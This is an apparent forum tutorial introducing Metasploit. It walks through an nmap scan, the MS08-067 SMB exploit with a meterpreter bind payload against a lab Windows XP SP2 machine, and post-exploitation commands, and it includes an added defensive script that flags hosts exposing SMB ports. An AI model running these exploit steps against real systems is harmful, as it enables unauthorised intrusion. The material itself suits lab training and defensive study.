This tutorial will give a basic introduction to metasploit.
In the process, we'll also exploit a machine and run meterpreter on it.
Everything that needs to be typed in the console makes use of the code tag, for example:
Code:
msfconsole
Also, I assume you have some basic understanding of networking and Linux.
WARNING, it is illegal to access a machine in any way that you do not have permission to access and it might get you in jail. I am not responsible for the actions you take. You have been warned.
now on to the actual guide.
requirements:
backtrack 4 final
non-patched windows xp sp2 box
(confirmed that this does not work on xp sp3)
some patience
These are my IPs; make sure to change them to reflect your own settings.
attacker: 192.168.198.129
victim: 192.168.198.130
Ok, first things first, make sure that metasploit is updated:
Code:
/pentest/exploits/fasttrack/fast-track.py -i 1 2
Do an nmap scan to make sure there are some open ports (with hopefully vulnerable services):
Code:
nmap -v 192.168.198.130
Nmap is done scanning and showed me 3 open ports. (If yours say filtered on all ports, try turning off any firewall.)
These are ports 135, 139 and 445.
We're going to focus on port 445.
A quick search on Google shows us that port 445 is commonly used for SMB.
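The same scan output is what an administrator would use to find machines that still expose SMB to the network, which is the condition the rest of this tutorial depends on. The following is an added example, not part of the original post: a small Python script that parses nmap's normal output and reports hosts with 135, 139 or 445 open, so they can be firewalled or checked for the MS08-067 fix. The sample output is constructed to match the three ports found above (both the older "Interesting ports on" and the newer "Nmap scan report for" host headers are handled); the function names are my own.

```python
import re
from typing import Dict, List

# Constructed sample of `nmap -v <host>` normal output, modelled on the three
# ports the tutorial found (135, 139, 445); not captured from a real scan.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap ( http://nmap.org )
Interesting ports on 192.168.198.130:
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 1.23 seconds
"""

# Windows RPC / NetBIOS / SMB ports; 445 is the one ms08_067_netapi talks to.
SMB_PORTS = {135: "msrpc", 139: "netbios-ssn", 445: "microsoft-ds (SMB)"}

# Host header line, in either the old or the new nmap wording.
HOST_RE = re.compile(r"^(?:Nmap scan report for|Interesting ports on) (\S+?):?$")
# Port table line: "<port>/tcp <state> <service>".
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\w+)\s+(\S+)")


def parse_open_ports(nmap_output: str) -> Dict[str, List[int]]:
    """Return {host: [open tcp ports]} parsed from nmap's normal output."""
    result: Dict[str, List[int]] = {}
    host = None
    for raw in nmap_output.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            result.setdefault(host, [])
            continue
        m = PORT_RE.match(line)
        if m and host is not None and m.group(2) == "open":
            result[host].append(int(m.group(1)))
    return result


def smb_exposure(nmap_output: str) -> Dict[str, List[int]]:
    """Hosts that expose any RPC/NetBIOS/SMB port, and which of those ports."""
    exposed = {}
    for host, ports in parse_open_ports(nmap_output).items():
        hits = [p for p in ports if p in SMB_PORTS]
        if hits:
            exposed[host] = hits
    return exposed


def report(nmap_output: str) -> List[str]:
    """Human-readable findings, one line per host plus a remediation hint for 445."""
    lines = []
    for host, ports in smb_exposure(nmap_output).items():
        names = ", ".join(f"{p}/tcp {SMB_PORTS[p]}" for p in ports)
        lines.append(f"{host}: RPC/NetBIOS/SMB reachable on {names}")
        if 445 in ports:
            lines.append(f"{host}: verify the MS08-067 fix is installed or block 445/tcp at the host firewall")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_NMAP_OUTPUT):
        print(line)
```

Feed it the saved output of `nmap -v` over a subnet and every host in the report is one to patch or filter before anybody else runs the steps below against it.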
Start up metasploit:
Code:
msfconsole
When it's done loading:
Code:
show exploits windows
We need an exploit for SMB, so we need to choose one from the smb folder. I used the ms08_067_netapi exploit.
Code:
use windows/smb/ms08_067_netapi
Notice that after we typed this, the prompt msf > changed to msf exploit(ms08_067_netapi) >
Great, so now we have an exploit, but what next?
An exploit is useless without a payload, so:
Code:
show payloads
This will give us a list of payloads compatible with the exploit.
We're going to use a meterpreter payload for this tutorial:
Code:
set payload windows/meterpreter/bind_tcp
Now to configure it all:
Code:
info
set target 3
set rhost 192.168.198.130
target is which Windows version and service pack our victim runs (in our case XP SP2), though you could also leave it how it is.
rhost is the IP of the victim.
Everything else can be default.
If the payload were a reverse TCP one, we would also need to set lhost; lhost is the attacker's IP.
Code:
exploit
This is what we (should) get:
[*] Started bind handler
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.198.129:60087 -> 192.168.198.130:4444)
meterpreter >
Great! We're in!
Let's see what commands we've got at our disposal:
Code:
help
Under what username is meterpreter running?
Code:
getuid
What processes are running?
Code:
ps
And so we could go on and on about what we can do with meterpreter, but that is outside the scope of this tutorial.
Hope this guide has been useful to someone, somewhere.
For a more in-depth guide to what metasploit can do, check this link:
Metasploit Unleashed - Mastering the Framework